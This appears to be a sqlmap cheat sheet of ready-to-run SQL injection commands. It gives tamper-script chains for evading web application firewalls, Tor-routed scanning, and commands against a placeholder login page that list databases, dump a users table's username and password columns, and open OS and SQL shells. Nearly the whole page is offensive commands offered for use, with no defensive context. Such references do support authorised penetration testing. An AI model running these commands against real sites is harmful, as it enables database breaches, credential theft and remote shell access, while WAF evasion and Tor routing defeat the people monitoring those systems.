# SqlMap

**WAF Bypass**

**1) MSSQL**

```
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
```

**2) MySQL**

```
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
```

**3) General tampering option**

```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```

**WAF bypass example string**

```
sudo sqlmap -m SQLtargets.txt --dbs --batch --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

# WAF bypass using Tor

sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor
```

**Scanning multiple targets**

```
sudo sqlmap -m SQLtargets.txt --dbs --batch
```

{% embed url="<https://github.com/sqlmapproject/sqlmap/tree/master/tamper>" %}

**Easy Scanning option**\
\
`sqlmap -u "http://testsite.com/login.php"`\
\
**Scanning by using tor**\
\
`sqlmap -u "http://testsite.com/login.php" --tor --tor-type=SOCKS5`\
\
**Scanning with a manually set time-based response delay (in seconds)**\
\
`sqlmap -u "http://testsite.com/login.php" --time-sec 15`\
\
**List all databases at the site**\
\
`sqlmap -u "http://testsite.com/login.php" --dbs`\
\
**List all tables in a specific database**\
\
`sqlmap -u "http://testsite.com/login.php" -D site_db --tables`\
\
**Dump the contents of a DB table**\
\
`sqlmap -u "http://testsite.com/login.php" -D site_db -T users --dump`\
\
**List all columns in a table**\
\
`sqlmap -u "http://testsite.com/login.php" -D site_db -T users --columns`\
\
**Dump only selected columns**\
\
`sqlmap -u "http://testsite.com/login.php" -D site_db -T users -C username,password --dump`\
\
**Dump a table from a database when you have admin credentials**\
\
`sqlmap -u "http://testsite.com/login.php" --method "POST" --data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users --dump`\
\
**Get OS Shell**\
\
`sqlmap --dbms=mysql -u "http://testsite.com/login.php" --os-shell`\
\
**Get SQL Shell**\
\
`sqlmap --dbms=mysql -u "http://testsite.com/login.php" --sql-shell`\
\
**Injecting sitemap.xml pages**

```
# Adjust according to the underlying DB and target

sqlmap -u "target/sitemap.xml?offset=1" -p offset --level 5 --risk 3 --dbms=MySQL --hostname --test-filter="MySQL >= 5.0.12 stacked queries"
```
